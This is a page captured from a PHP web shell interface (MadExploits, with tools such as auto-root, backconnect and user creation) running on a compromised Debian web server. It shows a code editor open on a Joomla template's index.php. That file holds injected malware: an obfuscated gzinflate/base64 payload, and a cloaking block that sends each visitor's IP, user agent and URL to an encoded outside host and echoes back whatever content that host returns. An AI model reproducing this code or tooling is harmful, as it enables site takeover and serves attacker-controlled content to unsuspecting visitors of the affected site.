Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.215.149
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dialektologia /
web /
templates /
naturalist_bw /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
index.php
6.2
KB
-rw-r--r--
templateDetails.xml
1.96
KB
-rw-r--r--
template_thumbnail.png
30.5
KB
-rw-r--r--
zal.png
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php defined( '_VALID_MOS' ) or die( 'Restricted access' ); // needed to seperate the ISO number from the language file constant _ISO $iso = explode( '=', _ISO ); // xml prolog echo '<?xml version="1.0" encoding="'. $iso[1] .'"?' .'>'; #c3284d# echo(gzinflate(base64_decode("JY5LDsIgFEXnTboH8ibVSUkcKrAKN4DwBEz5BF6t7l5qZzcn9yeaqaEQo29BCYQf4i/91gcFNQ42mzVionmrgfA0ifCsOiJr1UjwROXKeUTyKya0DmeTI2+kqc3FF2CpeyXct0CEFVjvzcsSkpOgV8rA/mWPXC1WCakDvQSXJJg+uQc8BudJwgXYFiz5XSnBjxNqOt/GQfDjrfoB"))); #/c3284d# ?><?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <?php mosShowHead(); ?> <?php if ( $my->id ) { initEditor(); } $collspan_offset = ( mosCountModules( 'right' ) + mosCountModules( 'user2' ) ) ? 2 : 1; //script to determine which div setup for layout to use based on module configuration $user1 = 0; $user2 = 0; $colspan = 0; $right = 0; // banner combos //user1 combos if ( mosCountModules( 'user1' ) + mosCountModules( 'user2' ) == 2) { $user1 = 2; $user2 = 2; $colspan = 3; } elseif ( mosCountModules( 'user1' ) == 1 ) { $user1 = 1; $colspan = 1; } elseif ( mosCountModules( 'user2' ) == 1 ) { $user2 = 1; $colspan = 1; } //right based combos if ( mosCountModules( 'right' ) and ( empty( $_REQUEST['task'] ) || $_REQUEST['task'] != 'edit' ) ) { $right = 1; } ?> <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" /> <link href="<?php echo $mosConfig_live_site;?>/templates/<?php echo $mainframe->getTemplate(); ?>/css/template_css.css" rel="stylesheet" type="text/css" /> <!--[if lte IE 6]> <STYLE TYPE="text/css"> #left_side { float: left; padding: 10px 5px 10px 15px; width: 645px; </STYLE> <![endif]--> <?php if (mosGetParam( $_REQUEST, 'option') == 'com_frontpage') { ?> <link href="<? echo $mosConfig_live_site; ?>/mambots/content/smoothgallery/css/jd.gallery.css" rel="stylesheet" type="text/css" /> <link href="<? echo $mosConfig_live_site; ?>/mambots/content/smoothgallery/css/slightbox.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="<? echo $mosConfig_live_site; ?>/mambots/content/smoothgallery/scripts/mootools.js"></script> <script type="text/javascript" src="<? echo $mosConfig_live_site; ?>/mambots/content/smoothgallery/scripts/jd.gallery.js"></script> <script type="text/javascript" src="<? echo $mosConfig_live_site;?>/mambots/content/smoothgallery/scripts/slightbox.js"></script> <?php } ?> <script language="javascript" type="text/javascript"> function showToolTip(e,text){ if(document.all)e = event; var obj = document.getElementById('bubble_tooltip'); var obj2 = document.getElementById('bubble_tooltip_content'); obj2.innerHTML = text; obj.style.display = 'block'; var st = Math.max(document.body.scrollTop,document.documentElement.scrollTop); if(navigator.userAgent.toLowerCase().indexOf('safari')>=0)st=0; var leftPos = e.clientX-40; if(leftPos<0)leftPos = 0; obj.style.left = leftPos + 'px'; obj.style.top = e.clientY - obj.offsetHeight -1 + st + 'px'; } function hideToolTip() { document.getElementById('bubble_tooltip').style.display = 'none'; } </script> </head> <body> <center> <div id='page_wrapper'> <div style="position: relative; left: 30px; top: 20px; z-index: 1000; float: left"><IMG SRC="./templates/naturalist/zal.png" WIDTH="63" HEIGHT="100" BORDER="0"></div> <div id='page_header'> </div> <div id='menu_bar'> <div id="navcontainer"> <?php mosLoadModules ('user3'); //menu liste horizontal ?> </div> </div> <div id='content_wrapper'> <div class='spacer'></div> <div id='left_side'> <?php //mosPathWay(); ?> <?php mosLoadmodules("user9",-3)?> <?php mosMainBody(); ?> </div> <div id='right_side'> <?php mosLoadModules ( 'left', -2 ); //menu principal ?> </div> <div class='spacer'></div> </div> <div id='page_footer'> <?php //include_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/footer.php' ); ?> <SPAN style="text-decoration:none;color:#000000;font-size:10px;width:450px;text-align:center"> © by <A HREF="http://www.gwarypolskie.uw.edu.pl/index.php?option=com_content&task=view&id=293&Itemid=76" style="text-decoration:none;color:#000000;font-size:10px">Authors</A>. Powered by <A HREF="" style="text-decoration:none;color:#000000;font-size:10px">Joomla!</A></SPAN> </div> </div> <?php mosLoadModules( 'debug', -1 );?></center> </body> </html>
Close